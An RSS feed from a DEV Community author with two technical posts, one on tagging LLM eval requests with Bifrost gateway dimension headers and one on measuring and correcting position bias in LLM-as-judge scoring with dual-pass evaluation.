<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Marcus Chen</title>
    <description>The latest articles on DEV Community by Marcus Chen (@marcuswwchen).</description>
    <link>https://dev.to/marcuswwchen</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3859428%2F572085fe-831d-498b-854b-41102c7902ee.jpg</url>
      <title>DEV Community: Marcus Chen</title>
      <link>https://dev.to/marcuswwchen</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/marcuswwchen"/>
    <language>en</language>
    <item>
      <title>Request tagging for LLM evals with Bifrost dimension headers</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Thu, 25 Jun 2026 16:01:58 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/request-tagging-for-llm-evals-with-bifrost-dimension-headers-38li</link>
      <guid>https://dev.to/marcuswwchen/request-tagging-for-llm-evals-with-bifrost-dimension-headers-38li</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; Request tagging with Bifrost dimension headers (&lt;code&gt;x-bf-dim-*&lt;/code&gt;) stamps checkpoint and run metadata onto every LLM eval call, so you slice scores by model version instead of guessing which change moved the aggregate.&lt;/p&gt;

&lt;p&gt;We ran roughly 12,000 eval requests across four fine-tuned checkpoints last sprint, and when aggregate accuracy moved three points I couldn't tell which checkpoint produced which response. Our eval harness stored prompts and scores in one table; the routing layer recorded latency and provider somewhere else, and nothing carried the experiment ID end to end. We moved the eval traffic behind &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;the open-source AI gateway&lt;/a&gt; from Maxim AI, and used its custom dimension headers to stamp each request with the checkpoint and run ID. Request tagging turned a join-by-timestamp guessing game into a filter.&lt;/p&gt;

&lt;h2&gt;
  
  
  What request tagging means for LLM evals
&lt;/h2&gt;

&lt;p&gt;Request tagging attaches key-value metadata to each LLM API call so downstream logs, traces, and metrics can be grouped by that metadata. In Bifrost, any header prefixed &lt;code&gt;x-bf-dim-*&lt;/code&gt; becomes a custom dimension that is auto-forwarded to logs, traces, and Prometheus, which lets you group eval scores by checkpoint, prompt version, or suite without modifying your harness.&lt;/p&gt;

&lt;p&gt;I lead the fine-tuning and evaluation team at Nexus Labs, a Series B company building enterprise agent automation. Our problem was attribution, not measurement. A scoring function that returns 0.81 is useless if you can't tie that number to &lt;code&gt;agentqa-v7-lora-r16&lt;/code&gt; versus &lt;code&gt;agentqa-v6&lt;/code&gt;. Most eval setups solve this by threading an experiment ID through every layer of application code, which breaks the moment someone forgets a kwarg. Pushing the metadata into a request header at the gateway means the harness stays dumb and the dimension travels with the request.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stamping requests with x-bf-dim headers
&lt;/h2&gt;

&lt;p&gt;Bifrost is a &lt;a href="https://docs.getbifrost.ai/features/drop-in-replacement" rel="noopener noreferrer"&gt;drop-in replacement&lt;/a&gt; for the OpenAI base URL, so the only changes to our harness were the &lt;code&gt;base_url&lt;/code&gt; and three extra headers. The gateway holds the provider keys, so the client-side API key is just a placeholder.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;openai&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;OpenAI&lt;/span&gt;

&lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;OpenAI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;base_url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://localhost:8080/v1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;api_key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;unused-bifrost-holds-keys&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;resp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;chat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;completions&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;openai/gpt-4o-mini&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;role&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;content&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;eval_case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;}],&lt;/span&gt;
    &lt;span class="n"&gt;extra_headers&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;x-bf-dim-checkpoint&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;agentqa-v7-lora-r16&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;x-bf-dim-run-id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;eval-2026-06-19-batch3&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;x-bf-dim-suite&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tool-routing-adversarial&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every request in that batch now carries three dimensions. When the scorer writes its verdict, I don't need to correlate anything by hand; the gateway already recorded the dimensions next to the latency, token counts, and resolved provider. The same endpoint fronts &lt;a href="https://docs.getbifrost.ai/providers/supported-providers/overview" rel="noopener noreferrer"&gt;20+ providers&lt;/a&gt;, so when I shadow a hosted model against a self-hosted checkpoint, both legs of the comparison get tagged identically and land in the same store.&lt;/p&gt;

&lt;h2&gt;
  
  
  Slicing eval results in observability
&lt;/h2&gt;

&lt;p&gt;The dimensions are only useful if the read path is cheap. Bifrost writes telemetry through &lt;a href="https://docs.getbifrost.ai/features/observability" rel="noopener noreferrer"&gt;async observability&lt;/a&gt; with under 0.1ms of added overhead, using SQLite by default and Postgres for production volume. The sinks include Prometheus, OpenTelemetry, Datadog, and BigQuery, so I query the same dimensions from whichever tool the rest of the team already watches.&lt;/p&gt;

&lt;p&gt;In practice I pull a Prometheus query grouped by &lt;code&gt;checkpoint&lt;/code&gt; and &lt;code&gt;suite&lt;/code&gt;, then compute per-slice accuracy from the scorer table joined on &lt;code&gt;run_id&lt;/code&gt;. That is where the three-point aggregate move resolved: checkpoint v7 gained on the general suite and lost on the adversarial tool-routing suite, which the average had flattened. This kind of per-segment attribution is the whole reason I distrust single-number eval reports. Aggregate metrics are a summary statistic, and summary statistics hide structure by design. The methodology argument is old; the &lt;a href="https://arxiv.org/abs/2211.09110" rel="noopener noreferrer"&gt;HELM evaluation work&lt;/a&gt; made the case for multi-metric, multi-scenario reporting years ago. Tagging at the gateway is the plumbing that makes per-scenario reporting cheap enough to actually do on every run.&lt;/p&gt;
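
&lt;p&gt;To make the flattening effect concrete, here is a minimal sketch with made-up numbers (not our results). It assumes the scorer rows have already been joined to the gateway dimensions, so each row carries a checkpoint, a suite, and a boolean verdict; the row layout and the &lt;code&gt;accuracy_by&lt;/code&gt; helper are hypothetical.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;from collections import defaultdict

# Hypothetical joined rows: (checkpoint, suite, correct). Made-up data.
rows = (
    [("v6", "general", True)] * 70 + [("v6", "general", False)] * 30
    + [("v6", "adversarial", True)] * 60 + [("v6", "adversarial", False)] * 40
    + [("v7", "general", True)] * 85 + [("v7", "general", False)] * 15
    + [("v7", "adversarial", True)] * 50 + [("v7", "adversarial", False)] * 50
)

def accuracy_by(rows, key):
    """Group rows with key(row) and return {group: fraction correct}."""
    hits = defaultdict(int)
    totals = defaultdict(int)
    for row in rows:
        group = key(row)
        totals[group] += 1
        hits[group] += int(row[2])
    return {group: hits[group] / totals[group] for group in totals}

# One number per checkpoint versus one number per (checkpoint, suite) slice.
aggregate = accuracy_by(rows, key=lambda r: r[0])
per_slice = accuracy_by(rows, key=lambda r: (r[0], r[1]))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;In this toy data the aggregate for v7 is 2.5 points above v6, while the per-slice view shows a 15-point gain on the general suite and a 10-point loss on the adversarial one. The same grouping works for any dimension you tagged.&lt;/p&gt;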

&lt;p&gt;One detail that saved me time: the dimensions are arbitrary strings, so I tag prompt-template hashes too. When a template edit slipped into a run, the &lt;code&gt;prompt_hash&lt;/code&gt; dimension showed two distinct values inside one supposedly clean batch, and I caught a contaminated comparison before it reached a decision.&lt;/p&gt;
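
&lt;p&gt;A minimal sketch of how such a hash could be produced and attached, using only the standard library. The helper names and the &lt;code&gt;x-bf-dim-prompt-hash&lt;/code&gt; header name are assumptions for illustration; only the &lt;code&gt;x-bf-dim-&lt;/code&gt; prefix comes from the setup above.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import hashlib

def prompt_hash(template):
    """Short, stable fingerprint of a prompt template string."""
    return hashlib.sha256(template.encode("utf-8")).hexdigest()[:12]

def tag_headers(checkpoint, run_id, suite, template):
    """Build the dimension headers for one eval request."""
    # "prompt-hash" is an assumed dimension name, not a documented one.
    return {
        "x-bf-dim-checkpoint": checkpoint,
        "x-bf-dim-run-id": run_id,
        "x-bf-dim-suite": suite,
        "x-bf-dim-prompt-hash": prompt_hash(template),
    }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The returned dict can be passed as &lt;code&gt;extra_headers&lt;/code&gt; on the request. Any edit to the template, even whitespace, changes the hash, which is what makes a mixed batch visible.&lt;/p&gt;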

&lt;h2&gt;
  
  
  Trade-offs and limitations
&lt;/h2&gt;

&lt;p&gt;This is not free infrastructure. Bifrost runs as a separate Go service, so you operate one more process, and a serious deployment needs Postgres rather than the default SQLite once you push real eval volume through it. If your stack is pure Python and you want everything in-process, a library like LiteLLM keeps fewer moving parts, at the cost of the gateway-level telemetry I'm describing here. Bifrost's ecosystem is also younger than LiteLLM's, so you will find fewer community examples for edge integrations.&lt;/p&gt;

&lt;p&gt;The dimension headers are forwarded, not validated. Nothing stops a typo in &lt;code&gt;x-bf-dim-checkpoint&lt;/code&gt; from creating a phantom slice, so I keep the tag values in one constants module and assert against it in the harness. Cluster-mode horizontal scaling is an &lt;a href="https://www.getmaxim.ai/bifrost/enterprise" rel="noopener noreferrer"&gt;enterprise feature&lt;/a&gt;, not part of the open-source core, which matters if your eval fleet outgrows a single instance. For a four-checkpoint sprint on one box, none of this bit me. Know your scale before you assume it won't.&lt;/p&gt;
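
&lt;p&gt;A guard of that kind can be very small. The sketch below is illustrative rather than a copy of our module: &lt;code&gt;ALLOWED_TAGS&lt;/code&gt;, &lt;code&gt;validated_headers&lt;/code&gt;, and the &lt;code&gt;general&lt;/code&gt; suite value are hypothetical names. Free-form values such as run IDs would need a pattern check instead of a fixed set.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;# Hypothetical constants module: the only place tag values are defined.
ALLOWED_TAGS = {
    "checkpoint": {"agentqa-v6", "agentqa-v7-lora-r16"},
    "suite": {"general", "tool-routing-adversarial"},
}
DIM_PREFIX = "x-bf-dim-"

def validated_headers(**dims):
    """Build x-bf-dim-* headers, rejecting unknown names and values."""
    headers = {}
    for name, value in dims.items():
        if name not in ALLOWED_TAGS:
            raise ValueError(f"unknown dimension: {name!r}")
        if value not in ALLOWED_TAGS[name]:
            raise ValueError(f"unknown {name} value: {value!r}")
        headers[DIM_PREFIX + name] = value
    return headers
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With this in place, a misspelled checkpoint fails in the harness before the request is sent, instead of showing up later as an unexplained extra slice.&lt;/p&gt;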

&lt;h2&gt;
  
  
  Wrapping up
&lt;/h2&gt;

&lt;p&gt;Request tagging with &lt;code&gt;x-bf-dim-*&lt;/code&gt; dimension headers moved attribution out of my eval code and into the gateway, which is where it belongs when many checkpoints and suites share one pipeline. The model was never the hard part. Knowing which model produced which number was. If you want to see the tagging and observability path end to end, book a demo: &lt;a href="https://getmaxim.ai/bifrost/book-a-demo" rel="noopener noreferrer"&gt;https://getmaxim.ai/bifrost/book-a-demo&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://docs.getbifrost.ai/features/observability" rel="noopener noreferrer"&gt;Bifrost observability docs&lt;/a&gt; for the metrics and sink configuration&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.getbifrost.ai/providers/supported-providers/overview" rel="noopener noreferrer"&gt;Supported providers overview&lt;/a&gt; for the unified endpoint&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.getmaxim.ai/bifrost/resources/buyers-guide" rel="noopener noreferrer"&gt;Bifrost buyer's guide&lt;/a&gt; for deployment patterns&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2211.09110" rel="noopener noreferrer"&gt;HELM: Holistic Evaluation of Language Models&lt;/a&gt; on multi-metric eval reporting&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://opentelemetry.io/docs/" rel="noopener noreferrer"&gt;OpenTelemetry documentation&lt;/a&gt; for trace and metric standards&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>mlops</category>
      <category>llm</category>
    </item>
    <item>
      <title>Position bias in LLM-as-judge flipped 18% of our verdicts</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Thu, 25 Jun 2026 06:31:28 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/position-bias-in-llm-as-judge-flipped-18-of-our-verdicts-13lf</link>
      <guid>https://dev.to/marcuswwchen/position-bias-in-llm-as-judge-flipped-18-of-our-verdicts-13lf</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; Position bias in LLM-as-judge means the model favors whichever answer it reads first. We measured an 18% verdict flip rate from swapping order alone, and dual-pass scoring brought it under 4%.&lt;/p&gt;

&lt;p&gt;Our pairwise evaluation harness at Nexus Labs scored answer A over answer B in 18% of cases purely because A appeared first in the judge prompt. We caught it when a regression in our agent-automation model showed a 6-point win on the leaderboard that vanished the moment a teammate reran the same comparisons with the candidate listed second. Position bias in LLM-as-judge is well documented, but most teams never measure it on their own data, so they ship on numbers that move when you shuffle the prompt. The judge model here was &lt;code&gt;gpt-4o-2024-08-06&lt;/code&gt;, scoring 1,200 pairwise comparisons of customer-support agent responses.&lt;/p&gt;

&lt;p&gt;This is the part of evaluation that gets skipped because the harness looks like it works. It returns scores. The scores have decimals. They go in a dashboard. Nobody checks whether the decimals mean anything.&lt;/p&gt;

&lt;h2&gt;
  
  
  What position bias in LLM-as-judge actually is
&lt;/h2&gt;

&lt;p&gt;Position bias in LLM-as-judge is the tendency of a model to prefer a response based on where it sits in the prompt rather than its quality. When you ask a model to pick the better of two answers, listing the same answer first versus second changes the verdict at a measurable rate. The effect was named in &lt;a href="https://arxiv.org/abs/2305.17926" rel="noopener noreferrer"&gt;Large Language Models are not Fair Evaluators&lt;/a&gt; and confirmed across judge models in the &lt;a href="https://arxiv.org/abs/2306.05685" rel="noopener noreferrer"&gt;MT-Bench paper&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;It is not random noise. The bias has a direction. In our runs &lt;code&gt;gpt-4o&lt;/code&gt; preferred the first position about 11 points more often than chance would predict, which is consistent with the first-position skew reported in both papers above.&lt;/p&gt;
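
&lt;p&gt;One way to put a number on that direction is to pool the raw verdicts from both orderings of every pair and ask how often the first slot wins. Each response then sits in each slot exactly once, so a judge with no position preference should pick the first slot about half the time. The sketch below assumes raw verdicts are recorded as &lt;code&gt;"x"&lt;/code&gt; (first slot), &lt;code&gt;"y"&lt;/code&gt; (second slot), or &lt;code&gt;"tie"&lt;/code&gt;; the function name is hypothetical and this is only one reasonable definition of the skew.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;def first_position_skew(raw_verdicts):
    """Points above 50% at which the first slot wins, ignoring ties.

    raw_verdicts: iterable of "x" (first slot won), "y" (second slot won),
    or "tie", pooled over both orderings of every pair.
    """
    decisive = [v for v in raw_verdicts if v != "tie"]
    if not decisive:
        return 0.0
    first_wins = sum(1 for v in decisive if v == "x")
    return 100.0 * (first_wins / len(decisive) - 0.5)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;A positive result means the judge leans toward the first slot, a negative one toward the second.&lt;/p&gt;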

&lt;h2&gt;
  
  
  How we measured the flip rate
&lt;/h2&gt;

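&lt;p&gt;The measurement is cheap. For every pair, run the judge twice: once with the candidate in slot A, once in slot B. If the verdict changes when only the order changed, that pair is order-sensitive. The flip rate is the fraction of pairs where this happens. The code below counts only decisive reversals, where a win for one side becomes a win for the other; a verdict that moves to or from a tie is not counted as a flip.&lt;/p&gt;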

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;judge_pair&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;judge&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;question&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;resp_x&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;resp_y&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="c1"&gt;# returns "x", "y", or "tie"
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;judge&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;compare&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;question&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;first&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;resp_x&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;second&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;resp_y&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;flips&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;q&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cand&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;base&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;pairs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;v1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;judge_pair&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;judge&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;q&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cand&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;base&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;# candidate first
&lt;/span&gt;    &lt;span class="n"&gt;v2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;judge_pair&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;judge&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;q&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;base&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cand&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;# candidate second
&lt;/span&gt;    &lt;span class="c1"&gt;# normalize v2 back to candidate-vs-base framing
&lt;/span&gt;    &lt;span class="n"&gt;v2_norm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;x&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;y&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;y&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;x&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tie&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tie&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;}[&lt;/span&gt;&lt;span class="n"&gt;v2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;v1&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;v2_norm&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tie&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v2_norm&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;flips&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

&lt;span class="n"&gt;flip_rate&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;flips&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pairs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We ran this across three judges. &lt;code&gt;gpt-4o&lt;/code&gt; flipped on 18% of pairs, &lt;code&gt;claude-3-5-sonnet&lt;/code&gt; on 12%, and a smaller &lt;code&gt;gpt-4o-mini&lt;/code&gt; judge flipped on 29%. The smallest judge was the most order-sensitive, which fits the intuition that weaker models lean harder on surface cues like ordering, though three judges are too few to call it a trend.&lt;/p&gt;

&lt;p&gt;To run the same comparison set against multiple providers without writing a client per vendor, we put the judge calls behind &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt; and pointed the harness at one OpenAI-compatible endpoint. That is the only infrastructure note here; the method works with any client you already have.&lt;/p&gt;

&lt;h2&gt;
  
  
  Dual-pass scoring and other fixes
&lt;/h2&gt;

&lt;p&gt;The fix that worked was the boring one: judge every pair in both orders and only count a win when both passes agree. Disagreements become ties. This is the conservative position-swap approach described in the MT-Bench paper, not score averaging, and it dropped our flip-driven verdicts to under 4% of pairs, because a true difference in quality survives the swap while an order artifact does not.&lt;/p&gt;

&lt;p&gt;Three approaches we compared:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dual-pass with agreement gate.&lt;/strong&gt; Run both orders, count a win only on agreement. Doubles judge cost, removes most order artifacts. This is what we shipped.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Score averaging.&lt;/strong&gt; Average a numeric score across both orders instead of gating. Cheaper to reason about, but a confident wrong score in one order can still drag the mean.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reference-anchored scoring.&lt;/strong&gt; Score each answer independently against a rubric instead of head-to-head, as in &lt;a href="https://arxiv.org/abs/2303.16634" rel="noopener noreferrer"&gt;G-Eval&lt;/a&gt;. Removes pairwise ordering entirely, but rubric scores are noisier and harder to calibrate across raters.&lt;/li&gt;
&lt;/ul&gt;
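
&lt;p&gt;The agreement gate from the first option fits in a few lines. This is a minimal sketch, not our production harness: &lt;code&gt;compare&lt;/code&gt; stands in for whatever judge call you already have and is assumed to return &lt;code&gt;"x"&lt;/code&gt; when the first response wins, &lt;code&gt;"y"&lt;/code&gt; when the second wins, or &lt;code&gt;"tie"&lt;/code&gt;.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;def dual_pass_verdict(compare, question, cand, base):
    """Return "cand", "base", or "tie" using both presentation orders.

    compare(question, first, second) is a hypothetical judge call that
    returns "x" if the first response wins, "y" if the second wins, or "tie".
    """
    # Map slot-based verdicts back to candidate-vs-baseline labels.
    to_cand_first = {"x": "cand", "y": "base", "tie": "tie"}
    to_base_first = {"x": "base", "y": "cand", "tie": "tie"}
    pass_1 = to_cand_first[compare(question, cand, base)]
    pass_2 = to_base_first[compare(question, base, cand)]
    # A win counts only when both orders agree; anything else is a tie.
    return pass_1 if pass_1 == pass_2 else "tie"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;A judge that always picks the first slot produces a tie on every pair under this gate, which is the behavior you want from an order artifact.&lt;/p&gt;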

&lt;p&gt;We also report Cohen's kappa between the two passes as a standing health metric. When kappa drops below 0.6 on a new judge or prompt template, we treat the judge as unreliable for that task and stop trusting its leaderboard until we debug the template.&lt;/p&gt;
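
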